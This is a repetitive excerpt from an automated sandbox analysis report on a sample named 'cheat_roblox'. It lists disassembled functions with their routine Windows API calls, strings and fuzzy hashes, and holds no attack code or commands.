                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateFrameInfo__except_validate_context_recordabort
                                                                                                                  • String ID: csm
                                                                                                                  • API String ID: 2466640111-1018135373
                                                                                                                  • Opcode ID: ef48871438151390fa300b301edbe87f2aaf35895cd4fd9de5e2d21b12dcaab2
                                                                                                                  • Instruction ID: d119752887751ef38cf0948dfcec64587711e596554fa90909466a092f18e28e
                                                                                                                  • Opcode Fuzzy Hash: ef48871438151390fa300b301edbe87f2aaf35895cd4fd9de5e2d21b12dcaab2
                                                                                                                  • Instruction Fuzzy Hash: ED51497361874287D620AB16E04036E77B4FB89B90F040535EB9D87B55EF3DE462EB0A
                                                                                                                  Function 00007FF6E7E54360 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                                                  • String ID: U
                                                                                                                  • API String ID: 2456169464-4171548499
                                                                                                                  • Opcode ID: a3c4996b5397ae7c68c43f4944c85cd830f0b958292ccb38960a62bfe152ddee
                                                                                                                  • Instruction ID: 10beb6ea2170656c28d25b0cabe6c1201b7b05927b4e7d1a98cdfc0e7d7e51d4
                                                                                                                  • Opcode Fuzzy Hash: a3c4996b5397ae7c68c43f4944c85cd830f0b958292ccb38960a62bfe152ddee
                                                                                                                  • Instruction Fuzzy Hash: 4D41AE23A18B8582EB208F25F8443AA67A1FB88794F444131EE9DC7B98EF7DD442C745
                                                                                                                  Function 00007FF6E7E390B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ObjectRelease
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1429681911-3916222277
                                                                                                                  • Opcode ID: 0b5772d91688d342ea342be5c9c3c9ea07a5ad9e93d570546deb1a9808731c40
                                                                                                                  • Instruction ID: 641f51bdc0b2b5f8b59f877fa4e1941ef0a56cb89ed27c75f720623203dadc9f
                                                                                                                  • Opcode Fuzzy Hash: 0b5772d91688d342ea342be5c9c3c9ea07a5ad9e93d570546deb1a9808731c40
                                                                                                                  • Instruction Fuzzy Hash: A731503660874286EB04DF12F81876AB760F789FD9F504435ED9A87BA5CE3DD449CB04
                                                                                                                  Function 00007FF6E7E2E870 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • InitializeCriticalSection.KERNEL32(?,?,?,00007FF6E7E3317F,?,?,00001000,00007FF6E7E1E51D), ref: 00007FF6E7E2E8BB
                                                                                                                  • CreateSemaphoreW.KERNEL32(?,?,?,00007FF6E7E3317F,?,?,00001000,00007FF6E7E1E51D), ref: 00007FF6E7E2E8CB
                                                                                                                  • CreateEventW.KERNEL32(?,?,?,00007FF6E7E3317F,?,?,00001000,00007FF6E7E1E51D), ref: 00007FF6E7E2E8E4
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                                                  • String ID: Thread pool initialization failed.
                                                                                                                  • API String ID: 3340455307-2182114853
                                                                                                                  • Opcode ID: 6610cce2f1ff4f40d78c24fcbab0d777ace7136147ab701da82aad1b7a389e44
                                                                                                                  • Instruction ID: 51b9d6bff6d9ce5819a96d7ebfdf1222dff2620dd172d5b4c9a8d805b5813cff
                                                                                                                  • Opcode Fuzzy Hash: 6610cce2f1ff4f40d78c24fcbab0d777ace7136147ab701da82aad1b7a389e44
                                                                                                                  • Instruction Fuzzy Hash: A121D533E1565786F7508F24E4493B933A2FB94B08F188034CAAD8B295DF7F9845C789
                                                                                                                  Function 00007FF6E7E385E0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CapsDeviceRelease
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 127614599-3916222277
                                                                                                                  • Opcode ID: a42f7bf34e2550c06df92b4c4441a28b155cc5d7cfc3f2a0da00e80f490195b4
                                                                                                                  • Instruction ID: 69009fb550a0118d353d0c669fdcce8e1fb37e0734f863608ab53c9a6cb4e52b
                                                                                                                  • Opcode Fuzzy Hash: a42f7bf34e2550c06df92b4c4441a28b155cc5d7cfc3f2a0da00e80f490195b4
                                                                                                                  • Instruction Fuzzy Hash: 2DE0C222B0868382FB0867B6F58923A2361EB4CBD0F158039DA6F877D5CE3DC4C44304
                                                                                                                  Function 00007FF6E7E1D1A8 Relevance: 6.2, APIs: 4, Instructions: 238timeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$FileTime
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1137671866-0
                                                                                                                  • Opcode ID: 3e0de6b87fc756f79ac571a371d77b74ab10159eff9a06e36aa9ff194842a8ae
                                                                                                                  • Instruction ID: e978d9a8dc8d86f639d6e37cf1fa97ab7c32e1c284a3357f16b897b271660bd6
                                                                                                                  • Opcode Fuzzy Hash: 3e0de6b87fc756f79ac571a371d77b74ab10159eff9a06e36aa9ff194842a8ae
                                                                                                                  • Instruction Fuzzy Hash: 70A1A263B18B8281EA10DB65E8413AD6371FF85784F405131EAED87AE9DF3EE548C709
                                                                                                                  Function 00007FF6E7E30548 Relevance: 6.1, APIs: 4, Instructions: 122COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1452528299-0
                                                                                                                  • Opcode ID: e740716fb16c43b695f5f219d8f3a9084bf63b213528ce6e7a445183d4fb0460
                                                                                                                  • Instruction ID: 6d3a8a3a7e42f13e1a7cc61c7995fd7d8251159a86701ae3b686fbd2a79d6acf
                                                                                                                  • Opcode Fuzzy Hash: e740716fb16c43b695f5f219d8f3a9084bf63b213528ce6e7a445183d4fb0460
                                                                                                                  • Instruction Fuzzy Hash: 1651A273B14A4695FB009B78E4453FC2362EF84B98F404132DAAC97BEAEE2DD545C349
                                                                                                                  Function 00007FF6E7E39D90 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateCurrentDirectoryErrorFreeLastLocalProcess
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1077098981-0
                                                                                                                  • Opcode ID: 5a43cb7f5a8bc2b697eb0b834037522765625dc86c8d5e2913923eaf6a834e49
                                                                                                                  • Instruction ID: f34bf295aa14b2a7633a5b9164c20d065d019dbccbe1d0ffab7dc83e7c9c058a
                                                                                                                  • Opcode Fuzzy Hash: 5a43cb7f5a8bc2b697eb0b834037522765625dc86c8d5e2913923eaf6a834e49
                                                                                                                  • Instruction Fuzzy Hash: 95517D33A18B4286EB408F61E4483AE77B4FB84B88F501035EA9E97A58DF3ED415CB45
                                                                                                                  Function 00007FF6E7E4DB5C Relevance: 6.1, APIs: 4, Instructions: 104COMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4141327611-0
                                                                                                                  • Opcode ID: fdb879c7c344a6dcddabd48f24568e2f5e84c2dc3f6ceef9c32cec135b3ccbbf
                                                                                                                  • Instruction ID: 25f7d2d659bea23fc716ca2331a53843100f60ca8a565b8f3b08bcf9efb47e1d
                                                                                                                  • Opcode Fuzzy Hash: fdb879c7c344a6dcddabd48f24568e2f5e84c2dc3f6ceef9c32cec135b3ccbbf
                                                                                                                  • Instruction Fuzzy Hash: 8D418073A0868246FB75DF50D040379A291EF80B90F158131DBED86AD5EF6EE843A74A
                                                                                                                  Function 00007FF6E7E23980 Relevance: 6.1, APIs: 4, Instructions: 101fileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileMove_invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3823481717-0
                                                                                                                  • Opcode ID: 2b6e6cda77fd8470acf22c2ab4e7c3ce966b7b843ddf4af9049b565a023b9c35
                                                                                                                  • Instruction ID: b51193116b28fd998eb5d1ba28afa79b1d3ba7ac27940835a755c1278ebc6553
                                                                                                                  • Opcode Fuzzy Hash: 2b6e6cda77fd8470acf22c2ab4e7c3ce966b7b843ddf4af9049b565a023b9c35
                                                                                                                  • Instruction Fuzzy Hash: 3641B263F1479284FB00CB79E8452AC2371BF44B98B105231DEAD97A99EF7DD445C349
                                                                                                                  Function 00007FF6E7E50B78 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF6E7E4C45B), ref: 00007FF6E7E50B91
                                                                                                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF6E7E4C45B), ref: 00007FF6E7E50BF3
                                                                                                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF6E7E4C45B), ref: 00007FF6E7E50C2D
                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF6E7E4C45B), ref: 00007FF6E7E50C57
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1557788787-0
                                                                                                                  • Opcode ID: 23704c5f87cc5d65a6a85ab0da0438508b9fc27f2b888927c3d6011bf25654c1
                                                                                                                  • Instruction ID: 744c58583c51a91c6074d3d2423005a340583982e282042708da1eb88af5d879
                                                                                                                  • Opcode Fuzzy Hash: 23704c5f87cc5d65a6a85ab0da0438508b9fc27f2b888927c3d6011bf25654c1
                                                                                                                  • Instruction Fuzzy Hash: 37217532F18B5581E6649F22F44123976A4FB55BD0B484134EEEEA3BA4DF3DE4528309
                                                                                                                  Function 00007FF6E7E4D440 Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$abort
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1447195878-0
                                                                                                                  • Opcode ID: df247b5a3948333368795c339682862bf84e23f7c025c70b8dad3e7beb060077
                                                                                                                  • Instruction ID: 82cc53a026eef141d1180cbbd90345098bad60e7577a49a1bfcc2790790ac553
                                                                                                                  • Opcode Fuzzy Hash: df247b5a3948333368795c339682862bf84e23f7c025c70b8dad3e7beb060077
                                                                                                                  • Instruction Fuzzy Hash: 9C019E27F0960A42FA58E771EA5933911A15F44B90F140478DBFEC27D6FE2EF802620A
                                                                                                                  Function 00007FF6E7E38590 Relevance: 6.0, APIs: 4, Instructions: 21COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CapsDevice$Release
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1035833867-0
                                                                                                                  • Opcode ID: de15d0a72ac65e47349a1b4cc9ca260558533dfe27db70e7b1e031f833f09c6c
                                                                                                                  • Instruction ID: 59b0397473fbd503284af7ca8c794ce297ef9821de9b502ad1f7534a0d91d36e
                                                                                                                  • Opcode Fuzzy Hash: de15d0a72ac65e47349a1b4cc9ca260558533dfe27db70e7b1e031f833f09c6c
                                                                                                                  • Instruction Fuzzy Hash: 65E01B61E0974382FF085B71E85933512909F4C756F144439C87FCA3D5DD3E9045C719
                                                                                                                  Function 00007FF6E7E1E34C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 176COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID: DXGIDebug.dll
                                                                                                                  • API String ID: 3668304517-540382549
                                                                                                                  • Opcode ID: 0ad4200ea2e17e03f5faeaa6ee63d869aa1a242b7c6a49e8d582d697c98f1931
                                                                                                                  • Instruction ID: 3bee2e3a1de52b2f942699e9149e743c096457e4cfdccc174a35ee064f320fd3
                                                                                                                  • Opcode Fuzzy Hash: 0ad4200ea2e17e03f5faeaa6ee63d869aa1a242b7c6a49e8d582d697c98f1931
                                                                                                                  • Instruction Fuzzy Hash: A871CC73A14B8282EB14CB25E8403ADB3A9FB58794F044235DBAD47B95DF7DE161C348
                                                                                                                  Function 00007FF6E7E4E1F4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                  • String ID: e+000$gfff
                                                                                                                  • API String ID: 3215553584-3030954782
